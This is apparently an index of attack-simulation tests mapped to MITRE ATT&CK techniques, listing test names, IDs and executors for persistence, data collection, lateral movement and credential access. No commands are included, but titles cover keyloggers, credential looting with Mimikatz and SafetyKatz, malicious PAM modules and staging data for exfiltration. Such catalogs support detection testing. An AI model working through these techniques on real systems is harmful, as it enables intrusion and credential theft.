774 persistence T1574.006 Hijack Execution Flow: LD_PRELOAD 2 Shared Library Injection via LD_PRELOAD bc219ff7-789f-4d51-9142-ecae3397deae bash
775 persistence T1574.006 Hijack Execution Flow: LD_PRELOAD 3 Dylib Injection via DYLD_INSERT_LIBRARIES 4d66029d-7355-43fd-93a4-b63ba92ea1be bash
776 persistence T1136.001 Create Account: Local Account 1 Create a user account on a Linux system 40d8eabd-e394-46f6-8785-b9bfa1d011d2 bash
777 persistence T1136.001 Create Account: Local Account 2 Create a user account on a MacOS system 01993ba5-1da3-4e15-a719-b690d4f0f0b2 bash
778 persistence T1136.001 Create Account: Local Account 3 Create a new user in a command prompt 6657864e-0323-4206-9344-ac9cd7265a4f command_prompt
779 persistence T1136.001 Create Account: Local Account 4 Create a new user in PowerShell bc8be0ac-475c-4fbf-9b1d-9fffd77afbde powershell
780 persistence T1136.001 Create Account: Local Account 5 Create a new user in Linux with `root` UID and GID. a1040a30-d28b-4eda-bd99-bb2861a4616c bash
781 persistence T1136.001 Create Account: Local Account 6 Create a new Windows admin user fda74566-a604-4581-a4cc-fbbe21d66559 command_prompt
782 persistence T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 1 Winlogon Shell Key Persistence - PowerShell bf9f9d65-ee4d-4c3e-a843-777d04f19c38 powershell
783 persistence T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 2 Winlogon Userinit Key Persistence - PowerShell fb32c935-ee2e-454b-8fa3-1c46b42e8dfb powershell
784 persistence T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 3 Winlogon Notify Key Logon Persistence - PowerShell d40da266-e073-4e5a-bb8b-2b385023e5f9 powershell
785 persistence T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 4 Winlogon HKLM Shell Key Persistence - PowerShell 95a3c42f-8c88-4952-ad60-13b81d929a9d powershell
786 persistence T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 5 Winlogon HKLM Userinit Key Persistence - PowerShell f9b8daff-8fa7-4e6a-a1a7-7c14675a545b powershell
787 persistence T1098.004 SSH Authorized Keys 1 Modify SSH Authorized Keys 342cc723-127c-4d3a-8292-9c0c6b4ecadc bash
788 persistence T1546.012 Event Triggered Execution: Image File Execution Options Injection 1 IFEO Add Debugger fdda2626-5234-4c90-b163-60849a24c0b8 command_prompt
789 persistence T1546.012 Event Triggered Execution: Image File Execution Options Injection 2 IFEO Global Flags 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 command_prompt
790 persistence T1546.012 Event Triggered Execution: Image File Execution Options Injection 3 GlobalFlags in Image File Execution Options 13117939-c9b2-4a43-999e-0a543df92f0d powershell
791 persistence T1546.008 Event Triggered Execution: Accessibility Features 1 Attaches Command Prompt as a Debugger to a List of Target Processes 3309f53e-b22b-4eb6-8fd2-a6cf58b355a9 powershell
792 persistence T1546.008 Event Triggered Execution: Accessibility Features 2 Replace binary of sticky keys 934e90cf-29ca-48b3-863c-411737ad44e3 command_prompt
793 persistence T1546.008 Event Triggered Execution: Accessibility Features 3 Create Symbolic Link From osk.exe to cmd.exe 51ef369c-5e87-4f33-88cd-6d61be63edf2 command_prompt
794 persistence T1136.002 Create Account: Domain Account 1 Create a new Windows domain admin user fcec2963-9951-4173-9bfa-98d8b7834e62 command_prompt
795 persistence T1136.002 Create Account: Domain Account 2 Create a new account similar to ANONYMOUS LOGON dc7726d2-8ccb-4cc6-af22-0d5afb53a548 command_prompt
796 persistence T1136.002 Create Account: Domain Account 3 Create a new Domain Account using PowerShell 5a3497a4-1568-4663-b12a-d4a5ed70c7d7 powershell
797 persistence T1546.009 Event Triggered Execution: AppCert DLLs 1 Create registry persistence via AppCert DLL a5ad6104-5bab-4c43-b295-b4c44c7c6b05 powershell
798 persistence T1547.015 Boot or Logon Autostart Execution: Login Items 1 Persistence by modifying Windows Terminal profile ec5d76ef-82fe-48da-b931-bdb25a62bc65 powershell
799 persistence T1547.015 Boot or Logon Autostart Execution: Login Items 2 Add macOS LoginItem using Applescript 716e756a-607b-41f3-8204-b214baf37c1d bash
800 persistence T1098.001 Account Manipulation: Additional Cloud Credentials 1 Azure AD Application Hijacking - Service Principal b8e747c3-bdf7-4d71-bce2-f1df2a057406 powershell
801 persistence T1098.001 Account Manipulation: Additional Cloud Credentials 2 Azure AD Application Hijacking - App Registration a12b5531-acab-4618-a470-0dafb294a87a powershell
802 persistence T1098.001 Account Manipulation: Additional Cloud Credentials 3 AWS - Create Access Key and Secret Key 8822c3b0-d9f9-4daf-a043-491160a31122 sh
803 persistence T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription 1 Persistence via WMI Event Subscription - CommandLineEventConsumer 3c64f177-28e2-49eb-a799-d767b24dd1e0 powershell
804 persistence T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription 2 Persistence via WMI Event Subscription - ActiveScriptEventConsumer fecd0dfd-fb55-45fa-a10b-6250272d0832 powershell
805 persistence T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription 3 Windows MOFComp.exe Load MOF File 29786d7e-8916-4de6-9c55-be7b093b2706 powershell
806 persistence T1546.001 Event Triggered Execution: Change Default File Association 1 Change Default File Association 10a08978-2045-4d62-8c42-1957bbbea102 command_prompt
807 persistence T1546.014 Event Triggered Execution: Emond 1 Persistance with Event Monitor - emond 23c9c127-322b-4c75-95ca-eff464906114 sh
808 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 1 Reg Key Run e55be3fd-3521-4610-9d1a-e210e42dcf05 command_prompt
809 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 2 Reg Key RunOnce 554cbd88-cde1-4b56-8168-0be552eed9eb command_prompt
810 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 3 PowerShell Registry RunOnce eb44f842-0457-4ddc-9b92-c4caa144ac42 powershell
811 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 4 Suspicious vbs file run from startup Folder 2cb98256-625e-4da9-9d44-f2e5f90b8bd5 powershell
812 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 5 Suspicious jse file run from startup Folder dade9447-791e-4c8f-b04b-3a35855dfa06 powershell
813 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 6 Suspicious bat file run from startup Folder 5b6768e4-44d2-44f0-89da-a01d1430fd5e powershell
814 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 7 Add Executable Shortcut Link to User Startup Folder 24e55612-85f6-4bd6-ae74-a73d02e3441d powershell
815 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 8 Add persistance via Recycle bin bda6a3d6-7aa7-4e89-908b-306772e9662f command_prompt
816 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 9 SystemBC Malware-as-a-Service Registry 9dc7767b-30c1-4cc4-b999-50cab5e27891 powershell
817 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 10 Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value acfef903-7662-447e-a391-9c91c2f00f7b powershell
818 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 11 Change Startup Folder - HKCU Modify User Shell Folders Startup Value 8834b65a-f808-4ece-ad7e-2acdf647aafa powershell
819 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 12 HKCU - Policy Settings Explorer Run Key a70faea1-e206-4f6f-8d9a-67379be8f6f1 powershell
820 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 13 HKLM - Policy Settings Explorer Run Key b5c9a9bc-dda3-4ea0-b16a-add8e81ab75f powershell
821 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 14 HKLM - Append Command to Winlogon Userinit KEY Value f7fab6cc-8ece-4ca7-a0f1-30a22fccd374 powershell
822 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 15 HKLM - Modify default System Shell - Winlogon Shell KEY Value 1d958c61-09c6-4d9e-b26b-4130314e520e powershell
823 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 16 secedit used to create a Run key in the HKLM Hive 14fdc3f1-6fc3-4556-8d36-aa89d9d42d02 command_prompt
824 persistence T1136.003 Create Account: Cloud Account 1 AWS - Create a new IAM user 8d1c2368-b503-40c9-9057-8e42f21c58ad sh
825 persistence T1098 Account Manipulation 1 Admin Account Manipulate 5598f7cb-cf43-455e-883a-f6008c5d46af powershell
826 persistence T1098 Account Manipulation 2 Domain Account and Group Manipulate a55a22e9-a3d3-42ce-bd48-2653adb8f7a9 powershell
827 persistence T1098 Account Manipulation 3 AWS - Create a group and add a user to that group 8822c3b0-d9f9-4daf-a043-49f110a31122 sh
828 persistence T1098 Account Manipulation 4 Azure - adding user to Azure AD role 0e65ae27-5385-46b4-98ac-607a8ee82261 powershell
829 persistence T1098 Account Manipulation 5 Azure - adding service principal to Azure AD role 92c40b3f-c406-4d1f-8d2b-c039bf5009e4 powershell
830 persistence T1098 Account Manipulation 6 Azure - adding user to Azure role in subscription 1a94b3fc-b080-450a-b3d8-6d9b57b472ea powershell
831 persistence T1098 Account Manipulation 7 Azure - adding service principal to Azure role in subscription c8f4bc29-a151-48da-b3be-4680af56f404 powershell
832 persistence T1098 Account Manipulation 8 AzureAD - adding permission to application 94ea9cc3-81f9-4111-8dde-3fb54f36af4b powershell
833 persistence T1098 Account Manipulation 9 Password Change on Directory Service Restore Mode (DSRM) Account d5b886d9-d1c7-4b6e-a7b0-460041bf2823 command_prompt
834 persistence T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions 1 Linux - Load Kernel Module via insmod 687dcb93-9656-4853-9c36-9977315e9d23 bash
835 persistence T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions 2 MacOS - Load Kernel Module via kextload and kmutil f4391089-d3a5-4dd1-ab22-0419527f2672 bash
836 persistence T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions 3 MacOS - Load Kernel Module via KextManagerLoadKextWithURL() f0007753-beb3-41ea-9948-760785e4c1e5 bash
837 persistence T1053.006 Scheduled Task/Job: Systemd Timers 1 Create Systemd Service and Timer f4983098-bb13-44fb-9b2c-46149961807b bash
838 persistence T1053.006 Scheduled Task/Job: Systemd Timers 2 Create a user level transient systemd service and timer 3de33f5b-62e5-4e63-a2a0-6fd8808c80ec sh
839 persistence T1053.006 Scheduled Task/Job: Systemd Timers 3 Create a system level transient systemd service and timer d3eda496-1fc0-49e9-aff5-3bec5da9fa22 sh
840 persistence T1546 Event Triggered Execution 1 Persistence with Custom AutodialDLL aca9ae16-7425-4b6d-8c30-cad306fdbd5b powershell
841 persistence T1546 Event Triggered Execution 2 HKLM - Persistence using CommandProcessor AutoRun key (With Elevation) a574dafe-a903-4cce-9701-14040f4f3532 powershell
842 persistence T1546 Event Triggered Execution 3 HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation) 36b8dbf9-59b1-4e9b-a3bb-36e80563ef01 powershell
843 persistence T1546.004 Event Triggered Execution: .bash_profile and .bashrc 1 Add command to .bash_profile 94500ae1-7e31-47e3-886b-c328da46872f sh
844 persistence T1546.004 Event Triggered Execution: .bash_profile and .bashrc 2 Add command to .bashrc 0a898315-4cfa-4007-bafe-33a4646d115f sh
845 persistence T1547.002 Authentication Package 1 Authentication Package be2590e8-4ac3-47ac-b4b5-945820f2fbe9 powershell
846 persistence T1546.015 Event Triggered Execution: Component Object Model Hijacking 1 COM Hijacking - InprocServer32 48117158-d7be-441b-bc6a-d9e36e47b52b powershell
847 persistence T1546.015 Event Triggered Execution: Component Object Model Hijacking 2 Powershell Execute COM Object 752191b1-7c71-445c-9dbe-21bb031b18eb powershell
848 persistence T1546.015 Event Triggered Execution: Component Object Model Hijacking 3 COM Hijacking with RunDLL32 (Local Server Switch) 123520cc-e998-471b-a920-bd28e3feafa0 powershell
849 persistence T1546.015 Event Triggered Execution: Component Object Model Hijacking 4 COM hijacking via TreatAs 33eacead-f117-4863-8eb0-5c6304fbfaa9 powershell
850 persistence T1137.004 Office Application Startup: Outlook Home Page 1 Install Outlook Home Page Persistence 7a91ad51-e6d2-4d43-9471-f26362f5738e command_prompt
851 persistence T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path 1 Execution of program.exe as service with unquoted service path 2770dea7-c50f-457b-84c4-c40a47460d9f command_prompt
852 persistence T1037.005 Boot or Logon Initialization Scripts: Startup Items 1 Add file to Local Library StartupItems 134627c3-75db-410e-bff8-7a920075f198 sh
853 persistence T1197 BITS Jobs 1 Bitsadmin Download (cmd) 3c73d728-75fb-4180-a12f-6712864d7421 command_prompt
854 persistence T1197 BITS Jobs 2 Bitsadmin Download (PowerShell) f63b8bc4-07e5-4112-acba-56f646f3f0bc powershell
855 persistence T1197 BITS Jobs 3 Persist, Download, & Execute 62a06ec5-5754-47d2-bcfc-123d8314c6ae command_prompt
856 persistence T1197 BITS Jobs 4 Bits download using desktopimgdownldr.exe (cmd) afb5e09e-e385-4dee-9a94-6ee60979d114 command_prompt
857 persistence T1546.010 Event Triggered Execution: AppInit DLLs 1 Install AppInit Shim a58d9386-3080-4242-ab5f-454c16503d18 command_prompt
858 persistence T1546.002 Event Triggered Execution: Screensaver 1 Set Arbitrary Binary as Screensaver 281201e7-de41-4dc9-b73d-f288938cbb64 command_prompt
859 persistence T1543.001 Create or Modify System Process: Launch Agent 1 Launch Agent a5983dee-bf6c-4eaf-951c-dbc1a7b90900 bash
860 persistence T1543.001 Create or Modify System Process: Launch Agent 2 Event Monitor Daemon Persistence 11979f23-9b9d-482a-9935-6fc9cd022c3e bash
861 persistence T1037.004 Boot or Logon Initialization Scripts: Rc.common 1 rc.common 97a48daa-8bca-4bc0-b1a9-c1d163e762de bash
862 persistence T1037.004 Boot or Logon Initialization Scripts: Rc.common 2 rc.common c33f3d80-5f04-419b-a13a-854d1cbdbf3a bash
863 persistence T1037.004 Boot or Logon Initialization Scripts: Rc.common 3 rc.local 126f71af-e1c9-405c-94ef-26a47b16c102 bash
864 persistence T1543.002 Create or Modify System Process: Systemd Service 1 Create Systemd Service d9e4f24f-aa67-4c6e-bcbf-85622b697a7c bash
865 persistence T1543.002 Create or Modify System Process: Systemd Service 2 Create Systemd Service file, Enable the service , Modify and Reload the service. c35ac4a8-19de-43af-b9f8-755da7e89c89 bash
866 persistence T1547.007 Boot or Logon Autostart Execution: Re-opened Applications 1 Copy in loginwindow.plist for Re-Opened Applications 5fefd767-ef54-4ac6-84d3-751ab85e8aba sh
867 persistence T1547.007 Boot or Logon Autostart Execution: Re-opened Applications 2 Re-Opened Applications using LoginHook 5f5b71da-e03f-42e7-ac98-d63f9e0465cb sh
868 persistence T1547.007 Boot or Logon Autostart Execution: Re-opened Applications 3 Append to existing loginwindow for Re-Opened Applications 766b6c3c-9353-4033-8b7e-38b309fa3a93 sh
869 persistence T1574.002 Hijack Execution Flow: DLL Side-Loading 1 DLL Side-Loading using the Notepad++ GUP.exe binary 65526037-7079-44a9-bda1-2cb624838040 command_prompt
870 persistence T1574.002 Hijack Execution Flow: DLL Side-Loading 2 DLL Side-Loading using the dotnet startup hook environment variable d322cdd7-7d60-46e3-9111-648848da7c02 command_prompt
871 persistence T1037.001 Boot or Logon Initialization Scripts: Logon Script (Windows) 1 Logon Scripts d6042746-07d4-4c92-9ad8-e644c114a231 command_prompt
872 persistence T1137.002 Office Application Startup: Office Test 1 Office Application Startup Test Persistence c3e35b58-fe1c-480b-b540-7600fb612563 command_prompt
873 persistence T1547.008 Boot or Logon Autostart Execution: LSASS Driver 1 Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt 8ecef16d-d289-46b4-917b-0dba6dc81cf1 powershell
874 persistence T1078.004 Valid Accounts: Cloud Accounts 1 Creating GCP Service Account and Service Account Key 9fdd83fd-bd53-46e5-a716-9dec89c8ae8e sh
875 persistence T1053.002 Scheduled Task/Job: At 1 At.exe Scheduled task 4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8 command_prompt
876 persistence T1053.002 Scheduled Task/Job: At 2 At - Schedule a job 7266d898-ac82-4ec0-97c7-436075d0d08e sh
877 persistence T1546.007 Event Triggered Execution: Netsh Helper DLL 1 Netsh Helper DLL Registration 3244697d-5a3a-4dfc-941c-550f69f91a4d command_prompt
878 persistence T1078.003 Valid Accounts: Local Accounts 1 Create local account with admin privileges a524ce99-86de-4db6-b4f9-e08f35a47a15 command_prompt
879 persistence T1078.003 Valid Accounts: Local Accounts 2 Create local account with admin privileges - MacOS f1275566-1c26-4b66-83e3-7f9f7f964daa bash
880 persistence T1078.003 Valid Accounts: Local Accounts 3 WinPwn - Loot local Credentials - powerhell kittie 9e9fd066-453d-442f-88c1-ad7911d32912 powershell
881 persistence T1078.003 Valid Accounts: Local Accounts 4 WinPwn - Loot local Credentials - Safetykatz e9fdb899-a980-4ba4-934b-486ad22e22f4 powershell
882 persistence T1574.012 Hijack Execution Flow: COR_PROFILER 1 User scope COR_PROFILER 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a powershell
883 persistence T1574.012 Hijack Execution Flow: COR_PROFILER 2 System Scope COR_PROFILER f373b482-48c8-4ce4-85ed-d40c8b3f7310 powershell
884 persistence T1574.012 Hijack Execution Flow: COR_PROFILER 3 Registry-free process scope COR_PROFILER 79d57242-bbef-41db-b301-9d01d9f6e817 powershell
885 collection T1560.001 Archive Collected Data: Archive via Utility 1 Compress Data for Exfiltration With Rar 02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0 command_prompt
886 collection T1560.001 Archive Collected Data: Archive via Utility 2 Compress Data and lock with password for Exfiltration with winrar 8dd61a55-44c6-43cc-af0c-8bdda276860c command_prompt
887 collection T1560.001 Archive Collected Data: Archive via Utility 3 Compress Data and lock with password for Exfiltration with winzip 01df0353-d531-408d-a0c5-3161bf822134 command_prompt
888 collection T1560.001 Archive Collected Data: Archive via Utility 4 Compress Data and lock with password for Exfiltration with 7zip d1334303-59cb-4a03-8313-b3e24d02c198 command_prompt
889 collection T1560.001 Archive Collected Data: Archive via Utility 5 Data Compressed - nix - zip c51cec55-28dd-4ad2-9461-1eacbc82c3a0 sh
890 collection T1560.001 Archive Collected Data: Archive via Utility 6 Data Compressed - nix - gzip Single File cde3c2af-3485-49eb-9c1f-0ed60e9cc0af sh
891 collection T1560.001 Archive Collected Data: Archive via Utility 7 Data Compressed - nix - tar Folder or File 7af2b51e-ad1c-498c-aca8-d3290c19535a sh
892 collection T1560.001 Archive Collected Data: Archive via Utility 8 Data Encrypted with zip and gpg symmetric 0286eb44-e7ce-41a0-b109-3da516e05a5f sh
893 collection T1113 Screen Capture 1 Screencapture 0f47ceb1-720f-4275-96b8-21f0562217ac bash
894 collection T1113 Screen Capture 2 Screencapture (silent) deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4 bash
895 collection T1113 Screen Capture 3 X Windows Capture 8206dd0c-faf6-4d74-ba13-7fbe13dce6ac bash
896 collection T1113 Screen Capture 4 Capture Linux Desktop using Import Tool 9cd1cccb-91e4-4550-9139-e20a586fcea1 bash
897 collection T1113 Screen Capture 5 Windows Screencapture 3c898f62-626c-47d5-aad2-6de873d69153 powershell
898 collection T1113 Screen Capture 6 Windows Screen Capture (CopyFromScreen) e9313014-985a-48ef-80d9-cde604ffc187 powershell
899 collection T1056.001 Input Capture: Keylogging 1 Input Capture d9b633ca-8efb-45e6-b838-70f595c6ae26 powershell
900 collection T1056.001 Input Capture: Keylogging 2 Living off the land Terminal Input Capture on Linux with pam.d 9c6bdb34-a89f-4b90-acb1-5970614c711b sh
901 collection T1056.001 Input Capture: Keylogging 3 Logging bash history to syslog 0e59d59d-3265-4d35-bebd-bf5c1ec40db5 sh
902 collection T1056.001 Input Capture: Keylogging 4 Bash session based keylogger 7f85a946-a0ea-48aa-b6ac-8ff539278258 sh
903 collection T1056.001 Input Capture: Keylogging 5 SSHD PAM keylogger 81d7d2ad-d644-4b6a-bea7-28ffe43becca sh
904 collection T1056.001 Input Capture: Keylogging 6 Auditd keylogger a668edb9-334e-48eb-8c2e-5413a40867af sh
905 collection T1056.001 Input Capture: Keylogging 7 MacOS Swift Keylogger aee3a097-4c5c-4fff-bbd3-0a705867ae29 bash
906 collection T1123 Audio Capture 1 using device audio capture commandlet 9c3ad250-b185-4444-b5a9-d69218a10c95 powershell
907 collection T1123 Audio Capture 2 Registry artefact when application use microphone 7a21cce2-6ada-4f7c-afd9-e1e9c481e44a command_prompt
908 collection T1123 Audio Capture 3 using Quicktime Player c7a0bb71-70ce-4a53-b115-881f241b795b sh
909 collection T1074.001 Data Staged: Local Data Staging 1 Stage data from Discovery.bat 107706a5-6f9f-451a-adae-bab8c667829f powershell
910 collection T1074.001 Data Staged: Local Data Staging 2 Stage data from Discovery.sh 39ce0303-ae16-4b9e-bb5b-4f53e8262066 bash
911 collection T1074.001 Data Staged: Local Data Staging 3 Zip a Folder with PowerShell for Staging in Temp a57fbe4b-3440-452a-88a7-943531ac872a powershell
912 collection T1114.001 Email Collection: Local Email Collection 1 Email Collection with PowerShell Get-Inbox 3f1b5096-0139-4736-9b78-19bcb02bb1cb powershell
913 collection T1119 Automated Collection 1 Automated Collection Command Prompt cb379146-53f1-43e0-b884-7ce2c635ff5b command_prompt
914 collection T1119 Automated Collection 2 Automated Collection PowerShell 634bd9b9-dc83-4229-b19f-7f83ba9ad313 powershell
915 collection T1119 Automated Collection 3 Recon information for export with PowerShell c3f6d794-50dd-482f-b640-0384fbb7db26 powershell
916 collection T1119 Automated Collection 4 Recon information for export with Command Prompt aa1180e2-f329-4e1e-8625-2472ec0bfaf3 command_prompt
917 collection T1115 Clipboard Data 1 Utilize Clipboard to store or execute commands from 0cd14633-58d4-4422-9ede-daa2c9474ae7 command_prompt
918 collection T1115 Clipboard Data 2 Execute Commands from Clipboard using PowerShell d6dc21af-bec9-4152-be86-326b6babd416 powershell
919 collection T1115 Clipboard Data 3 Execute commands from clipboard 1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff bash
920 collection T1115 Clipboard Data 4 Collect Clipboard Data via VBA 9c8d5a72-9c98-48d3-b9bf-da2cc43bdf52 powershell
921 collection T1115 Clipboard Data 5 Add or copy content to clipboard with xClip ee363e53-b083-4230-aff3-f8d955f2d5bb sh
922 collection T1530 Data from Cloud Storage Object 1 Azure - Enumerate Azure Blobs with MicroBurst 3dab4bcc-667f-4459-aea7-4162dd2d6590 powershell
923 collection T1530 Data from Cloud Storage Object 2 Azure - Scan for Anonymous Access to Azure Storage (Powershell) 146af1f1-b74e-4aa7-9895-505eb559b4b0 powershell
924 collection T1530 Data from Cloud Storage Object 3 AWS - Scan for Anonymous Access to S3 979356b9-b588-4e49-bba4-c35517c484f5 sh
925 collection T1560.002 Archive Collected Data: Archive via Library 1 Compressing data using GZip in Python (Linux) 391f5298-b12d-4636-8482-35d9c17d53a8 bash
926 collection T1560.002 Archive Collected Data: Archive via Library 2 Compressing data using bz2 in Python (Linux) c75612b2-9de0-4d7c-879c-10d7b077072d bash
927 collection T1560.002 Archive Collected Data: Archive via Library 3 Compressing data using zipfile in Python (Linux) 001a042b-859f-44d9-bf81-fd1c4e2200b0 bash
928 collection T1560.002 Archive Collected Data: Archive via Library 4 Compressing data using tarfile in Python (Linux) e86f1b4b-fcc1-4a2a-ae10-b49da01458db bash
929 collection T1560 Archive Collected Data 1 Compress Data for Exfiltration With PowerShell 41410c60-614d-4b9d-b66e-b0192dd9c597 powershell
930 collection T1557.001 Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay 1 LLMNR Poisoning with Inveigh (PowerShell) deecd55f-afe0-4a62-9fba-4d1ba2deb321 powershell
931 collection T1125 Video Capture 1 Registry artefact when application use webcam 6581e4a7-42e3-43c5-a0d2-5a0d62f9702a command_prompt
932 collection T1056.002 Input Capture: GUI Input Capture 1 AppleScript - Prompt User for Password 76628574-0bc1-4646-8fe2-8f4427b47d15 bash
933 collection T1056.002 Input Capture: GUI Input Capture 2 PowerShell - Prompt User for Password 2b162bfd-0928-4d4c-9ec3-4d9f88374b52 powershell
934 collection T1039 Data from Network Shared Drive 1 Copy a sensitive File over Administive share with copy 6ed67921-1774-44ba-bac6-adb51ed60660 command_prompt
935 collection T1039 Data from Network Shared Drive 2 Copy a sensitive File over Administive share with Powershell 7762e120-5879-44ff-97f8-008b401b9a98 powershell
936 collection T1056.004 Input Capture: Credential API Hooking 1 Hook PowerShell TLS Encrypt/Decrypt Messages de1934ea-1fbf-425b-8795-65fb27dd7e33 powershell
937 lateral-movement T1091 Replication Through Removable Media 1 USB Malware Spread Simulation d44b7297-622c-4be8-ad88-ec40d7563c75 powershell
938 lateral-movement T1021.002 Remote Services: SMB/Windows Admin Shares 1 Map admin share 3386975b-367a-4fbb-9d77-4dcf3639ffd3 command_prompt
939 lateral-movement T1021.002 Remote Services: SMB/Windows Admin Shares 2 Map Admin Share PowerShell 514e9cd7-9207-4882-98b1-c8f791bae3c5 powershell
940 lateral-movement T1021.002 Remote Services: SMB/Windows Admin Shares 3 Copy and Execute File with PsExec 0eb03d41-79e4-4393-8e57-6344856be1cf command_prompt
941 lateral-movement T1021.002 Remote Services: SMB/Windows Admin Shares 4 Execute command writing output to local Admin Share d41aaab5-bdfe-431d-a3d5-c29e9136ff46 command_prompt
942 lateral-movement T1021.006 Remote Services: Windows Remote Management 1 Enable Windows Remote Management 9059e8de-3d7d-4954-a322-46161880b9cf powershell
943 lateral-movement T1021.006 Remote Services: Windows Remote Management 2 Remote Code Execution with PS Credentials Using Invoke-Command 5295bd61-bd7e-4744-9d52-85962a4cf2d6 powershell
944 lateral-movement T1021.006 Remote Services: Windows Remote Management 3 WinRM Access with Evil-WinRM efe86d95-44c4-4509-ae42-7bfd9d1f5b3d powershell
945 lateral-movement T1021.003 Remote Services: Distributed Component Object Model 1 PowerShell Lateral Movement using MMC20 6dc74eb1-c9d6-4c53-b3b5-6f50ae339673 powershell
946 lateral-movement T1550.003 Use Alternate Authentication Material: Pass the Ticket 1 Mimikatz Kerberos Ticket Attack dbf38128-7ba7-4776-bedf-cc2eed432098 command_prompt
947 lateral-movement T1550.003 Use Alternate Authentication Material: Pass the Ticket 2 Rubeus Kerberos Pass The Ticket a2fc4ec5-12c6-4fb4-b661-961f23f359cb powershell
948 lateral-movement T1072 Software Deployment Tools 1 Radmin Viewer Utility b4988cad-6ed2-434d-ace5-ea2670782129 command_prompt
949 lateral-movement T1072 Software Deployment Tools 2 PDQ Deploy RAT e447b83b-a698-4feb-bed1-a7aaf45c3443 command_prompt
950 lateral-movement T1563.002 Remote Service Session Hijacking: RDP Hijacking 1 RDP hijacking a37ac520-b911-458e-8aed-c5f1576d9f46 command_prompt
951 lateral-movement T1550.002 Use Alternate Authentication Material: Pass the Hash 1 Mimikatz Pass the Hash ec23cef9-27d9-46e4-a68d-6f75f7b86908 command_prompt
952 lateral-movement T1550.002 Use Alternate Authentication Material: Pass the Hash 2 crackmapexec Pass the Hash eb05b028-16c8-4ad8-adea-6f5b219da9a9 command_prompt
953 lateral-movement T1550.002 Use Alternate Authentication Material: Pass the Hash 3 Invoke-WMIExec Pass the Hash f8757545-b00a-4e4e-8cfb-8cfb961ee713 powershell
954 lateral-movement T1021.001 Remote Services: Remote Desktop Protocol 1 RDP to DomainController 355d4632-8cb9-449d-91ce-b566d0253d3e powershell
955 lateral-movement T1021.001 Remote Services: Remote Desktop Protocol 2 Changing RDP Port to Non Standard Port via Powershell 2f840dd4-8a2e-4f44-beb3-6b2399ea3771 powershell
956 lateral-movement T1021.001 Remote Services: Remote Desktop Protocol 3 Changing RDP Port to Non Standard Port via Command_Prompt 74ace21e-a31c-4f7d-b540-53e4eb6d1f73 command_prompt
957 credential-access T1556.003 Modify Authentication Process: Pluggable Authentication Modules 1 Malicious PAM rule 4b9dde80-ae22-44b1-a82a-644bf009eb9c sh
958 credential-access T1556.003 Modify Authentication Process: Pluggable Authentication Modules 2 Malicious PAM module 65208808-3125-4a2e-8389-a0a00e9ab326 sh
959 credential-access T1056.001 Input Capture: Keylogging 1 Input Capture d9b633ca-8efb-45e6-b838-70f595c6ae26 powershell
960 credential-access T1056.001 Input Capture: Keylogging 2 Living off the land Terminal Input Capture on Linux with pam.d 9c6bdb34-a89f-4b90-acb1-5970614c711b sh
961 credential-access T1056.001 Input Capture: Keylogging 3 Logging bash history to syslog 0e59d59d-3265-4d35-bebd-bf5c1ec40db5 sh
962 credential-access T1056.001 Input Capture: Keylogging 4 Bash session based keylogger 7f85a946-a0ea-48aa-b6ac-8ff539278258 sh
963 credential-access T1056.001 Input Capture: Keylogging 5 SSHD PAM keylogger 81d7d2ad-d644-4b6a-bea7-28ffe43becca sh
964 credential-access T1056.001 Input Capture: Keylogging 6 Auditd keylogger a668edb9-334e-48eb-8c2e-5413a40867af sh
965 credential-access T1056.001 Input Capture: Keylogging 7 MacOS Swift Keylogger aee3a097-4c5c-4fff-bbd3-0a705867ae29 bash
966 credential-access T1110.001 Brute Force: Password Guessing 1 Brute Force Credentials of single Active Directory domain users via SMB 09480053-2f98-4854-be6e-71ae5f672224 command_prompt
967 credential-access T1110.001 Brute Force: Password Guessing 2 Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos) c2969434-672b-4ec8-8df0-bbb91f40e250 powershell
968 credential-access T1110.001 Brute Force: Password Guessing 3 Brute Force Credentials of single Azure AD user 5a51ef57-299e-4d62-8e11-2d440df55e69 powershell
